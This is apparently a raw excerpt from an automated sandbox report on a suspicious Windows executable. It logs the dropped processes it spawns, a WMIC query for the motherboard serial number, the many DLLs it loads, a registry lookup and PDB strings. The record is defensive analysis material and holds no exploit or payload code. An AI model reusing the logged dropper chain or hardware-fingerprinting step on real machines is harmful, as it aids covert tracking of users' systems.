Source: C:\Users\user\Desktop\1B0E0E0D120C156B155E15B0C0C160E0C160C.exeProcess created: C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exe "C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exe" -StartTP
Source: C:\Users\user\Desktop\1B0E0E0D120C156B155E15B0C0C160E0C160C.exeProcess created: C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exe "C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exe" -StartTP
Source: C:\Users\user\Desktop\VZ7xFmeuPX.exeProcess created: C:\Users\user\Desktop\1B0E0E0D120C156B155E15B0C0C160E0C160C.exe C:\Users\user\Desktop\1B0E0E0D120C156B155E15B0C0C160E0C160C.exeJump to behavior
Source: C:\Users\user\Desktop\1B0E0E0D120C156B155E15B0C0C160E0C160C.exeProcess created: C:\Windows\SysWOW64\wbem\WMIC.exe wmic BaseBoard get SerialNumberJump to behavior
Source: C:\Users\user\Desktop\1B0E0E0D120C156B155E15B0C0C160E0C160C.exeProcess created: C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exe "C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exe" -StartTPJump to behavior
Source: C:\Users\user\Desktop\1B0E0E0D120C156B155E15B0C0C160E0C160C.exeProcess created: C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exe "C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exe" -StartTPJump to behavior
Source: C:\Users\user\Desktop\VZ7xFmeuPX.exeSection loaded: apphelp.dllJump to behavior
Source: C:\Users\user\Desktop\VZ7xFmeuPX.exeSection loaded: winmm.dllJump to behavior
Source: C:\Users\user\Desktop\VZ7xFmeuPX.exeSection loaded: rasapi32.dllJump to behavior
Source: C:\Users\user\Desktop\VZ7xFmeuPX.exeSection loaded: wininet.dllJump to behavior
Source: C:\Users\user\Desktop\VZ7xFmeuPX.exeSection loaded: rasman.dllJump to behavior
Source: C:\Users\user\Desktop\VZ7xFmeuPX.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Users\user\Desktop\VZ7xFmeuPX.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Users\user\Desktop\VZ7xFmeuPX.exeSection loaded: advpack.dllJump to behavior
Source: C:\Users\user\Desktop\VZ7xFmeuPX.exeSection loaded: version.dllJump to behavior
Source: C:\Users\user\Desktop\1B0E0E0D120C156B155E15B0C0C160E0C160C.exeSection loaded: apphelp.dllJump to behavior
Source: C:\Users\user\Desktop\1B0E0E0D120C156B155E15B0C0C160E0C160C.exeSection loaded: winmm.dllJump to behavior
Source: C:\Users\user\Desktop\1B0E0E0D120C156B155E15B0C0C160E0C160C.exeSection loaded: rasapi32.dllJump to behavior
Source: C:\Users\user\Desktop\1B0E0E0D120C156B155E15B0C0C160E0C160C.exeSection loaded: wininet.dllJump to behavior
Source: C:\Users\user\Desktop\1B0E0E0D120C156B155E15B0C0C160E0C160C.exeSection loaded: rasman.dllJump to behavior
Source: C:\Users\user\Desktop\1B0E0E0D120C156B155E15B0C0C160E0C160C.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Users\user\Desktop\1B0E0E0D120C156B155E15B0C0C160E0C160C.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Users\user\Desktop\1B0E0E0D120C156B155E15B0C0C160E0C160C.exeSection loaded: msimg32.dllJump to behavior
Source: C:\Users\user\Desktop\1B0E0E0D120C156B155E15B0C0C160E0C160C.exeSection loaded: dwrite.dllJump to behavior
Source: C:\Users\user\Desktop\1B0E0E0D120C156B155E15B0C0C160E0C160C.exeSection loaded: advpack.dllJump to behavior
Source: C:\Users\user\Desktop\1B0E0E0D120C156B155E15B0C0C160E0C160C.exeSection loaded: version.dllJump to behavior
Source: C:\Users\user\Desktop\1B0E0E0D120C156B155E15B0C0C160E0C160C.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Users\user\Desktop\1B0E0E0D120C156B155E15B0C0C160E0C160C.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Users\user\Desktop\1B0E0E0D120C156B155E15B0C0C160E0C160C.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Users\user\Desktop\1B0E0E0D120C156B155E15B0C0C160E0C160C.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Users\user\Desktop\1B0E0E0D120C156B155E15B0C0C160E0C160C.exeSection loaded: windowscodecs.dllJump to behavior
Source: C:\Users\user\Desktop\1B0E0E0D120C156B155E15B0C0C160E0C160C.exeSection loaded: textinputframework.dllJump to behavior
Source: C:\Users\user\Desktop\1B0E0E0D120C156B155E15B0C0C160E0C160C.exeSection loaded: coreuicomponents.dllJump to behavior
Source: C:\Users\user\Desktop\1B0E0E0D120C156B155E15B0C0C160E0C160C.exeSection loaded: coremessaging.dllJump to behavior
Source: C:\Users\user\Desktop\1B0E0E0D120C156B155E15B0C0C160E0C160C.exeSection loaded: ntmarta.dllJump to behavior
Source: C:\Users\user\Desktop\1B0E0E0D120C156B155E15B0C0C160E0C160C.exeSection loaded: wintypes.dllJump to behavior
Source: C:\Users\user\Desktop\1B0E0E0D120C156B155E15B0C0C160E0C160C.exeSection loaded: wintypes.dllJump to behavior
Source: C:\Users\user\Desktop\1B0E0E0D120C156B155E15B0C0C160E0C160C.exeSection loaded: wintypes.dllJump to behavior
Source: C:\Users\user\Desktop\1B0E0E0D120C156B155E15B0C0C160E0C160C.exeSection loaded: textshaping.dllJump to behavior
Source: C:\Users\user\Desktop\1B0E0E0D120C156B155E15B0C0C160E0C160C.exeSection loaded: napinsp.dllJump to behavior
Source: C:\Users\user\Desktop\1B0E0E0D120C156B155E15B0C0C160E0C160C.exeSection loaded: pnrpnsp.dllJump to behavior
Source: C:\Users\user\Desktop\1B0E0E0D120C156B155E15B0C0C160E0C160C.exeSection loaded: wshbth.dllJump to behavior
Source: C:\Users\user\Desktop\1B0E0E0D120C156B155E15B0C0C160E0C160C.exeSection loaded: nlaapi.dllJump to behavior
Source: C:\Users\user\Desktop\1B0E0E0D120C156B155E15B0C0C160E0C160C.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Users\user\Desktop\1B0E0E0D120C156B155E15B0C0C160E0C160C.exeSection loaded: mswsock.dllJump to behavior
Source: C:\Users\user\Desktop\1B0E0E0D120C156B155E15B0C0C160E0C160C.exeSection loaded: dnsapi.dllJump to behavior
Source: C:\Users\user\Desktop\1B0E0E0D120C156B155E15B0C0C160E0C160C.exeSection loaded: winrnr.dllJump to behavior
Source: C:\Users\user\Desktop\1B0E0E0D120C156B155E15B0C0C160E0C160C.exeSection loaded: fwpuclnt.dllJump to behavior
Source: C:\Users\user\Desktop\1B0E0E0D120C156B155E15B0C0C160E0C160C.exeSection loaded: rasadhlp.dllJump to behavior
Source: C:\Users\user\Desktop\1B0E0E0D120C156B155E15B0C0C160E0C160C.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Users\user\Desktop\1B0E0E0D120C156B155E15B0C0C160E0C160C.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Users\user\Desktop\1B0E0E0D120C156B155E15B0C0C160E0C160C.exeSection loaded: wldp.dllJump to behavior
Source: C:\Users\user\Desktop\1B0E0E0D120C156B155E15B0C0C160E0C160C.exeSection loaded: profapi.dllJump to behavior
Source: C:\Users\user\Desktop\1B0E0E0D120C156B155E15B0C0C160E0C160C.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Users\user\Desktop\1B0E0E0D120C156B155E15B0C0C160E0C160C.exeSection loaded: winhttp.dllJump to behavior
Source: C:\Users\user\Desktop\1B0E0E0D120C156B155E15B0C0C160E0C160C.exeSection loaded: winnsi.dllJump to behavior
Source: C:\Users\user\Desktop\1B0E0E0D120C156B155E15B0C0C160E0C160C.exeSection loaded: dpapi.dllJump to behavior
Source: C:\Users\user\Desktop\1B0E0E0D120C156B155E15B0C0C160E0C160C.exeSection loaded: urlmon.dllJump to behavior
Source: C:\Users\user\Desktop\1B0E0E0D120C156B155E15B0C0C160E0C160C.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Users\user\Desktop\1B0E0E0D120C156B155E15B0C0C160E0C160C.exeSection loaded: netutils.dllJump to behavior
Source: C:\Users\user\Desktop\1B0E0E0D120C156B155E15B0C0C160E0C160C.exeSection loaded: dbghelp.dllJump to behavior
Source: C:\Users\user\Desktop\1B0E0E0D120C156B155E15B0C0C160E0C160C.exeSection loaded: riched20.dllJump to behavior
Source: C:\Users\user\Desktop\1B0E0E0D120C156B155E15B0C0C160E0C160C.exeSection loaded: usp10.dllJump to behavior
Source: C:\Users\user\Desktop\1B0E0E0D120C156B155E15B0C0C160E0C160C.exeSection loaded: msls31.dllJump to behavior
Source: C:\Windows\SysWOW64\wbem\WMIC.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Windows\SysWOW64\wbem\WMIC.exeSection loaded: framedynos.dllJump to behavior
Source: C:\Windows\SysWOW64\wbem\WMIC.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\SysWOW64\wbem\WMIC.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\SysWOW64\wbem\WMIC.exeSection loaded: wbemcomn.dllJump to behavior
Source: C:\Windows\SysWOW64\wbem\WMIC.exeSection loaded: msxml6.dllJump to behavior
Source: C:\Windows\SysWOW64\wbem\WMIC.exeSection loaded: urlmon.dllJump to behavior
Source: C:\Windows\SysWOW64\wbem\WMIC.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Windows\SysWOW64\wbem\WMIC.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Windows\SysWOW64\wbem\WMIC.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\SysWOW64\wbem\WMIC.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\SysWOW64\wbem\WMIC.exeSection loaded: vcruntime140.dllJump to behavior
Source: C:\Windows\SysWOW64\wbem\WMIC.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\SysWOW64\wbem\WMIC.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\SysWOW64\wbem\WMIC.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\SysWOW64\wbem\WMIC.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\SysWOW64\wbem\WMIC.exeSection loaded: vbscript.dllJump to behavior
Source: C:\Windows\SysWOW64\wbem\WMIC.exeSection loaded: sxs.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exeSection loaded: apphelp.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exeSection loaded: msvcp71.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exeSection loaded: msvcr71.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exeSection loaded: rasapi32.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exeSection loaded: version.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exeSection loaded: msvcr71.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exeSection loaded: rasman.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exeSection loaded: wldp.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exeSection loaded: profapi.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exeSection loaded: dhcpcsvc.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exeSection loaded: ntmarta.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exeSection loaded: atl71.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exeSection loaded: mswsock.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exeSection loaded: wininet.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exeSection loaded: zlib1.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exeSection loaded: mlang.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exeSection loaded: rtutils.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exeSection loaded: napinsp.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exeSection loaded: pnrpnsp.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exeSection loaded: wshbth.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exeSection loaded: nlaapi.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exeSection loaded: dnsapi.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exeSection loaded: winrnr.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exeSection loaded: fwpuclnt.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exeSection loaded: rasadhlp.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exeSection loaded: dhcpcsvc6.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exeSection loaded: winnsi.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exeSection loaded: winhttp.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exeSection loaded: urlmon.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exeSection loaded: netutils.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exeSection loaded: schannel.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exeSection loaded: msvcp71.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exeSection loaded: msvcr71.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exeSection loaded: rasapi32.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exeSection loaded: version.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exeSection loaded: rasman.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exeSection loaded: wldp.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exeSection loaded: profapi.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exeSection loaded: ntmarta.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exeSection loaded: atl71.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exeSection loaded: mswsock.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exeSection loaded: wininet.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exeSection loaded: zlib1.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exeSection loaded: mlang.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exeSection loaded: rtutils.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exeSection loaded: napinsp.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exeSection loaded: pnrpnsp.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exeSection loaded: wshbth.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exeSection loaded: nlaapi.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exeSection loaded: dnsapi.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exeSection loaded: winrnr.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exeSection loaded: fwpuclnt.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exeSection loaded: rasadhlp.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exeSection loaded: dhcpcsvc6.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exeSection loaded: dhcpcsvc.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exeSection loaded: winnsi.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exeSection loaded: winhttp.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exeSection loaded: urlmon.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exeSection loaded: netutils.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exeSection loaded: netapi32.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exeSection loaded: wkscli.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exeSection loaded: schannel.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exeSection loaded: mskeyprotect.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exeSection loaded: ntasn1.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exeSection loaded: ncrypt.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exeSection loaded: ncryptsslp.dllJump to behavior
Source: C:\Users\user\Desktop\1B0E0E0D120C156B155E15B0C0C160E0C160C.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0358b920-0ac7-461f-98f4-58e32cd89148}\InProcServer32Jump to behavior
Source: Window RecorderWindow detected: More than 3 window changes detected
Source: VZ7xFmeuPX.exeStatic file information: File size 28536832 > 1048576
Source: C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exeFile opened: C:\Users\user\AppData\Local\Temp\download\MSVCR71.dllJump to behavior
Source: VZ7xFmeuPX.exeStatic PE information: Raw size of dVek is bigger than: 0x100000 < 0x1af2000
Source: Binary string: d:\MiniTP\Src\MiniThunderPlatform\pdb\ProductForCommon\MiniThunderPlatform.pdb source: MiniThunderPlatform.exe, MiniThunderPlatform.exe, 0000000F.00000002.1723428878.0000000000448000.00000040.00000001.01000000.0000000F.sdmp
Source: Binary string: api-ms-win-crt-runtime-l1-1-0.pdb source: api-ms-win-crt-runtime-l1-1-0.dll.7.dr
Source: Binary string: C:\Program Files (x86)\e\lib\ExuiKrnln\ExuiKrnln_X32.pdb source: 1B0E0E0D120C156B155E15B0C0C160E0C160C.exe, 00000007.00000003.1435145583.0000000000528000.00000002.10000000.00040000.00000000.sdmp, 1B0E0E0D120C156B155E15B0C0C160E0C160C.exe, 00000007.00000003.1415571391.00000000081FC000.00000004.00000020.00020000.00000000.sdmp, 1B0E0E0D120C156B155E15B0C0C160E0C160C.exe, 00000007.00000003.1415739688.0000000008368000.00000004.00000020.00020000.00000000.sdmp, ExuiKrnln_Win32.lib.5.dr
Source: Binary string: atl71.pdb source: 1B0E0E0D120C156B155E15B0C0C160E0C160C.exe, 00000007.00000003.1435145583.0000000000528000.00000002.10000000.00040000.00000000.sdmp, MiniThunderPlatform.exe, 0000000E.00000002.1620289287.000000007C12E000.00000002.00000001.01000000.00000016.sdmp, MiniThunderPlatform.exe, 0000000F.00000002.1725957556.000000007C12E000.00000002.00000001.01000000.00000016.sdmp, atl71.dll.7.dr
Source: Binary string: d:\MiniTP\Src\MiniThunderPlatform\pdb\ProductForCommon\MiniThunderPlatform.pdbt source: MiniThunderPlatform.exe, 0000000E.00000002.1614044465.0000000000448000.00000040.00000001.01000000.0000000F.sdmp, MiniThunderPlatform.exe, 0000000F.00000002.1723428878.0000000000448000.00000040.00000001.01000000.0000000F.sdmp
Source: Binary string: d:\workspace\xlframework\win32_component\xlbugreport\bin\ReleseDll.vc7\XLBugHandler.pdb source: XLBugHandler.dll.7.dr
Source: Binary string: msvcp71.pdb source: MiniThunderPlatform.exe, MiniThunderPlatform.exe, 0000000F.00000002.1726562366.000000007C3C1000.00000040.00000001.01000000.00000011.sdmp
Source: Binary string: D:\a\_work\1\s\binaries\x86ret\bin\i386\\msvcp140_codecvt_ids.i386.pdb source: msvcp140_codecvt_ids.dll.7.dr
Source: Binary string: D:\a\_work\1\s\binaries\x86ret\bin\i386\\vcruntime140.i386.pdb source: vcruntime140.dll.7.dr
Source: Binary string: D:\a\_work\1\s\binaries\x86ret\bin\i386\\concrt140.i386.pdb source: concrt140.dll.7.dr
Source: Binary string: api-ms-win-crt-stdio-l1-1-0.pdb source: api-ms-win-crt-stdio-l1-1-0.dll.7.dr
Source: Binary string: D:\a\_work\1\s\binaries\x86ret\bin\i386\\msvcp140.i386.pdbGCTL source: msvcp140.dll.7.dr
Source: Binary string: api-ms-win-crt-heap-l1-1-0.pdbGCTL source: api-ms-win-crt-heap-l1-1-0.dll.7.dr
Source: Binary string: api-ms-win-crt-math-l1-1-0.pdb source: api-ms-win-crt-math-l1-1-0.dll.7.dr
Source: Binary string: C:\Program Files (x86)\e\lib\ExuiKrnln\ExuiKrnln_X64.pdb source: 1B0E0E0D120C156B155E15B0C0C160E0C160C.exe, 00000007.00000003.1416143729.00000000083CE000.00000004.00000020.00020000.00000000.sdmp, 1B0E0E0D120C156B155E15B0C0C160E0C160C.exe, 00000007.00000003.1435145583.0000000000528000.00000002.10000000.00040000.00000000.sdmp, 1B0E0E0D120C156B155E15B0C0C160E0C160C.exe, 00000007.00000003.1415949041.00000000081F1000.00000004.00000020.00020000.00000000.sdmp, ExuiKrnln_Win64.lib.5.dr
Source: Binary string: D:\a\_work\1\s\binaries\x86ret\bin\i386\\msvcp140_codecvt_ids.i386.pdbGCTL source: msvcp140_codecvt_ids.dll.7.dr
Source: Binary string: api-ms-win-crt-string-l1-1-0.pdbGCTL source: api-ms-win-crt-string-l1-1-0.dll.7.dr
Source: Binary string: C:\Program Files (x86)\e\lib\ExuiKrnln\ExuiKrnln_X64.pdb& source: 1B0E0E0D120C156B155E15B0C0C160E0C160C.exe, 00000007.00000003.1416143729.00000000083CE000.00000004.00000020.00020000.00000000.sdmp, 1B0E0E0D120C156B155E15B0C0C160E0C160C.exe, 00000007.00000003.1435145583.0000000000528000.00000002.10000000.00040000.00000000.sdmp, 1B0E0E0D120C156B155E15B0C0C160E0C160C.exe, 00000007.00000003.1415949041.00000000081F1000.00000004.00000020.00020000.00000000.sdmp, ExuiKrnln_Win64.lib.5.dr
Source: Binary string: ^msvcr71.pdb\ source: 1B0E0E0D120C156B155E15B0C0C160E0C160C.exe, 00000007.00000003.1435145583.0000000000528000.00000002.10000000.00040000.00000000.sdmp, msvcr71.dll.7.dr
Source: Binary string: api-ms-win-crt-math-l1-1-0.pdbGCTL source: api-ms-win-crt-math-l1-1-0.dll.7.dr
Source: Binary string: atl71.pdbT source: 1B0E0E0D120C156B155E15B0C0C160E0C160C.exe, 00000007.00000003.1435145583.0000000000528000.00000002.10000000.00040000.00000000.sdmp, MiniThunderPlatform.exe, 0000000E.00000002.1620289287.000000007C12E000.00000002.00000001.01000000.00000016.sdmp, MiniThunderPlatform.exe, 0000000F.00000002.1725957556.000000007C12E000.00000002.00000001.01000000.00000016.sdmp, atl71.dll.7.dr
Source: Binary string: d:\MiniDownloadLib\branches\bin\Product Release\download_engine.pdb source: MiniThunderPlatform.exe, MiniThunderPlatform.exe, 0000000F.00000002.1725202157.0000000010001000.00000040.00000001.01000000.00000014.sdmp
Source: Binary string: cmd_insert_server.icex-conference/x-cooltalk.movievideo/x-sgi-movievideo/x-msvideo.mxuvideo/vnd.mpegurl.qtvideo/quicktimevideo/mpeg.xmltext/xml.etxtext/x-setext.wmlstext/vnd.wap.wmlscript.wmltext/vnd.wap.wml.tsvtext/tab-separated-values.sgmtext/sgml.rtftext/rtf.rtxtext/richtext.txttext/plain.html.csstext/css.mshmodel/mesh.igsmodel/iges.xwdimage/x-xwindowdump.xpmimage/x-xpixmap.xbmimage/x-xbitmap.rgbimage/x-rgb.ppmimage/x-portable-pixmap.bgmimage/x-portable-graymap.pbmimage/x-portable-bitmap.pnmimage/x-portable-anymap.rasimage/x-cmu-raster.wbmpimage/vnd.wap.wbmp.djvimage/vnd.djvu.tiffimage/tiff.pngimage/png.jpgimage/jpeg.iefimage/ief.gifimage/gif.bmpimage/bmp.xyzchemical/x-xyz.pdbchemical/x-pdb.wavaudio/x-wavaudio/x-realaudio.arpmaudio/x-pn-realaudio-pluginaudio/x-pn-realaudio.m3uaudio/x-mpegurl.aifaudio/x-aiffaudio/mpeg.midiaudio/midiapplication/application/zip.xhtmlapplication/xhtml+xml.srcapplication/x-wais-source.ustarapplication/x-ustar.msapplication/x-troff-ms.meapplication/x-troff-me.manapplication/x-troff-man.texiapplication/x-texinfo.texapplication/x-tex.tclapplication/x-tclapplication/x-tar.sv4crcapplication/x-sv4crc.sv4cpioapplication/x-sv4cpio.sitapplication/x-stuffit.swfapplication/x-shockwave-flash.sharapplication/x-shar.shapplication/x-sh.latexapplication/x-latex.jsapplication/x-javascript.hdfapplication/x-hdf.gtarapplication/x-gtar.splapplication/x-futuresplash.dviapplication/x-dvi.cshapplication/x-csh.cpioapplication/x-cpio.pgnapplication/x-chess-pgn.vcdapplication/x-cdlink.bcpioapplication/x-bcpio.wmlscapplication/vnd.wap.wmlscriptc.wmlcapplication/vnd.wap.wmlc.wbxmlapplication/vnd.wap.wbxml.pptapplication/vnd.ms-powerpoint.xlsapplication/vnd.ms-excel.mifapplication/vnd.mif.smiapplication/smil.pdfapplication/pdf.odaapplication/oda.docapplication/msword.cptapplication/mac-compactpro.hqxapplication/mac-binhex40.ezapplication/andrew-inset source: MiniThunderPlatform.exe, 0000000E.00000002.1619279871.0000000010001000.00000040.00000001.01000000.00000014.sdmp, MiniThunderPlatform.exe, 0000000F.00000002.1725202157.0000000010001000.00000040.00000001.01000000.00000014.sdmp
Source: Binary string: D:\a\_work\1\s\binaries\x86ret\bin\i386\\msvcp140_atomic_wait.i386.pdb source: msvcp140_atomic_wait.dll.7.dr
Source: Binary string: D:\a\_work\1\s\binaries\x86ret\bin\i386\\msvcp140_atomic_wait.i386.pdbGCTL source: msvcp140_atomic_wait.dll.7.dr
